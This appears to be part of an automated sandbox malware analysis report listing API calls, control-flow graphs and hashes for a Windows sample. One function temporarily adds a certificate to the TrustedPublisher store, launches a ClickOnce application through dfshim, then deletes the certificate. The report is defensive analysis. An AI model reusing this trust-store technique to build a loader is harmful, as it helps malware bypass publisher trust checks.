                                                                                                                                                                                                                                                          • LocalAlloc.KERNELBASE(00000000,00040000), ref: 00BB1057
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00040000), ref: 00BB1063
                                                                                                                                                                                                                                                          • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00BB1082
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00BB10B2
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,?), ref: 00BB10C5
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00002000), ref: 00BB10F4
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00BB110A
                                                                                                                                                                                                                                                          • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00BB111A
                                                                                                                                                                                                                                                          • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00BB112D
                                                                                                                                                                                                                                                          • CertFreeCertificateContext.CRYPT32(00000000), ref: 00BB1134
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00BB113E
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00BB115D
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00BB116E
                                                                                                                                                                                                                                                          • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00BB1182
                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00BB1198
                                                                                                                                                                                                                                                          • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00BB11A9
                                                                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(dfshim), ref: 00BB11BA
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00BB11C6
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00009C40), ref: 00BB11E8
                                                                                                                                                                                                                                                          • CertDeleteCertificateFromStore.CRYPT32(?), ref: 00BB120B
                                                                                                                                                                                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 00BB121A
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00BB1223
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00BB1228
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00BB122D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
                                                                                                                                                                                                                                                          • String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
                                                                                                                                                                                                                                                          • API String ID: 335784236-860318880
                                                                                                                                                                                                                                                          • Opcode ID: 99414ae5810113a8caf731f6008b05d3dc74bd40d49be439e2144c4d14a0ad3d
                                                                                                                                                                                                                                                          • Instruction ID: 2ba58986e4ac0ccb41170c986dd1dc11a4ad0882865ce8d97a2db404b3e2382e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99414ae5810113a8caf731f6008b05d3dc74bd40d49be439e2144c4d14a0ad3d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C616E72A40219AFEB11AB94DC45FBFBBB5EF48B50F500154F614B7290CBF199018BA4

                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                          Function 00BB191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00BB192B
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00BB19F7
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BB1A10
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00BB1A1A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                                          • Opcode ID: 7391cbae4ade0bf2f596d00860a9c694f8ad11b6479c5124b1618bb9cab65ee0
                                                                                                                                                                                                                                                          • Instruction ID: df690e9f10e981cd687d914c831dede45afbb0ceca49184cb7ca772a85bbb470
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7391cbae4ade0bf2f596d00860a9c694f8ad11b6479c5124b1618bb9cab65ee0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D311875D012189BDB20EF64D989BDDBBF8AF08300F5041EAE40CAB250EBB09A85CF45
                                                                                                                                                                                                                                                          Function 00BB4573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BB466B
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BB4675
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BB4682
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                          • Opcode ID: 0f24347fc7f2738f1563a1e7f98f860b3ab37e985fff685a30baad6691b6faba
                                                                                                                                                                                                                                                          • Instruction ID: d4dd384d06cdab5f50e2a943c37dac373a0db5c19084371f7453d7de04dc84d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f24347fc7f2738f1563a1e7f98f860b3ab37e985fff685a30baad6691b6faba
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE31B3749012189BCB21DF68D989BDDBBF8FF08310F5046EAE41CA7251EBB09B858F45
                                                                                                                                                                                                                                                          Function 00BB3677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002,00000000,?,00BB3F66,00000003,00BB209F,00BB1AFC), ref: 00BB3698
                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00BB364D,?,00BC02E0,0000000C,00BB37A4,?,00000002,00000000,?,00BB3F66,00000003,00BB209F,00BB1AFC), ref: 00BB369F
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00BB36B1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                                          • Opcode ID: 430359ce93ba1c5e62e3697527ee9c338933ede43e71b9cbb56acc476842aefb
                                                                                                                                                                                                                                                          • Instruction ID: ca418b207f1ac197ee77c499afab023dcd8386d8a3cd9b57cbe549b748a6148f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 430359ce93ba1c5e62e3697527ee9c338933ede43e71b9cbb56acc476842aefb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43E0B631014548AFCF21BF54DD09EAA3BA9EF40745F404194FA569B231DFF5DE42CA50
                                                                                                                                                                                                                                                          Function 00BB4A4B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                          • API String ID: 0-248832578
                                                                                                                                                                                                                                                          • Opcode ID: b8b22b6f54397ba0cb63b487288860c5903d8f51f030062b85de8e6997d75617
                                                                                                                                                                                                                                                          • Instruction ID: cda04cbca70122b87f2ced90312ff9c4a541b28ddbb632b1066d8f49ae8b1754
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8b22b6f54397ba0cb63b487288860c5903d8f51f030062b85de8e6997d75617
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA31E272900249AFCB249E78CC84EFA7BFDEB85314F0441E9F55997252EBB09D458B50
                                                                                                                                                                                                                                                          Function 00BBA495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BBA490,?,?,00000008,?,?,00BBA130,00000000), ref: 00BBA6C2
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                          • Opcode ID: 861b9d6285df59f70278e796c05fc17c23cb215c6af9efb691424f5abd4185bb
                                                                                                                                                                                                                                                          • Instruction ID: f3b7571102dd04d54a392a8db3f725658bf01a9815085dde1e596141ec608fd8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 861b9d6285df59f70278e796c05fc17c23cb215c6af9efb691424f5abd4185bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BB15F71A10608DFD715CF28C48ABA47BE0FF45364F298698E89ACF2A1C775DD92CB41
                                                                                                                                                                                                                                                          Function 00BB1BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BB1BEA
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                          • Opcode ID: 3d5304941ab78fb2b7d9da8c043a010544d8c27c753aa5ade560323097d0073a
                                                                                                                                                                                                                                                          • Instruction ID: 2e979d8252981a6c8b51e2df4a1f5cdd0c68bf47c2495a771fb6899811448cad
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d5304941ab78fb2b7d9da8c043a010544d8c27c753aa5ade560323097d0073a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C517CB1A112058BDB15CF6CD891BAEBBF0FB88340F24886AC405EB261D7B4ED41CF50
                                                                                                                                                                                                                                                          Function 00BB1AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00BB1300), ref: 00BB1AB1
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                          • Opcode ID: a6ebf003e3c42eac2e72ccb7b45d290cfefef3b158eb4dac801a62ebcf95cdb8
                                                                                                                                                                                                                                                          • Instruction ID: 558c06a998dbff8bb03be8e80788235824f1b2f276a3798b343c3ec3b0b3fb1d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a6ebf003e3c42eac2e72ccb7b45d290cfefef3b158eb4dac801a62ebcf95cdb8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                          Function 00BB6893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                          • Opcode ID: 89666d2c8aacc2875f189268965bda6667f5c7c240b455c56ef4aa528aab4c83
                                                                                                                                                                                                                                                          • Instruction ID: c1b27db077faf9d7cf66289a5e71f517ca291eba9cc59572652669abed8a2e8a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89666d2c8aacc2875f189268965bda6667f5c7c240b455c56ef4aa528aab4c83
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76A02430300101CF4300CF34DF4570C35DC57045C070700145004F3030DF7040405F11
                                                                                                                                                                                                                                                          Function 00BB6507 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 81 bb6507-bb651b 82 bb6589-bb6591 81->82 83 bb651d-bb6522 81->83 84 bb65d8-bb65f0 call bb667a 82->84 85 bb6593-bb6596 82->85 83->82 86 bb6524-bb6529 83->86 93 bb65f3-bb65fa 84->93 85->84 87 bb6598-bb65d5 call bb4869 * 4 85->87 86->82 89 bb652b-bb652e 86->89 87->84 89->82 92 bb6530-bb6538 89->92 94 bb653a-bb653d 92->94 95 bb6552-bb655a 92->95 97 bb6619-bb661d 93->97 98 bb65fc-bb6600 93->98 94->95 99 bb653f-bb6551 call bb4869 call bb6078 94->99 100 bb655c-bb655f 95->100 101 bb6574-bb6588 call bb4869 * 2 95->101 108 bb661f-bb6624 97->108 109 bb6635-bb6641 97->109 103 bb6602-bb6605 98->103 104 bb6616 98->104 99->95 100->101 106 bb6561-bb6573 call bb4869 call bb6176 100->106 101->82 103->104 112 bb6607-bb6615 call bb4869 * 2 103->112 104->97 106->101 116 bb6632 108->116 117 bb6626-bb6629 108->117 109->93 111 bb6643-bb6650 call bb4869 109->111 112->104 116->109 117->116 125 bb662b-bb6631 call bb4869 117->125 125->116
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00BB654B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6095
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60A7
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60B9
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60CB
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60DD
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB60EF
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6101
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6113
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6125
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6137
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB6149
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB615B
                                                                                                                                                                                                                                                            • Part of subcall function 00BB6078: _free.LIBCMT ref: 00BB616D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6540
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6562
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6577
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6582
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65A4
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65B7
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65C5
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB65D0
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6608
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB660F
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB662C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB6644
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554665870.0000000000BBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554684885.0000000000BC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554701405.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_bb0000_96r3GgxntQ.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 161543041-0
                                                                                                                                                                                                                                                          • Opcode ID: da3357af9d4de5afe29aba4511e3f4dfc204c1b7588fe40e3281c79f6d30027e
                                                                                                                                                                                                                                                          • Instruction ID: 8b8875a40fc2affb83f9b5b79ce0301b5a48f2afc8ce469d78a46e74e0e7c7f4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da3357af9d4de5afe29aba4511e3f4dfc204c1b7588fe40e3281c79f6d30027e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD313B716002049FEB71AA7AD845BFA73F8FB50310F1444A9E44AD7192DFB9ED508B50
                                                                                                                                                                                                                                                          Function 00BB4330 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 138 bb4330-bb4341 139 bb434d-bb43d8 call bb4869 * 9 call bb41f6 call bb4246 138->139 140 bb4343-bb434c call bb4869 138->140 140->139
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4344
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: HeapFree.KERNEL32(00000000,00000000,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?), ref: 00BB487F
                                                                                                                                                                                                                                                            • Part of subcall function 00BB4869: GetLastError.KERNEL32(?,?,00BB620D,?,00000000,?,00000000,?,00BB6234,?,00000007,?,?,00BB669F,?,?), ref: 00BB4891
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4350
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB435B
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4366
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4371
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB437C
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4387
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB4392
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB439D
                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00BB43AB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554649372.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554631635.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
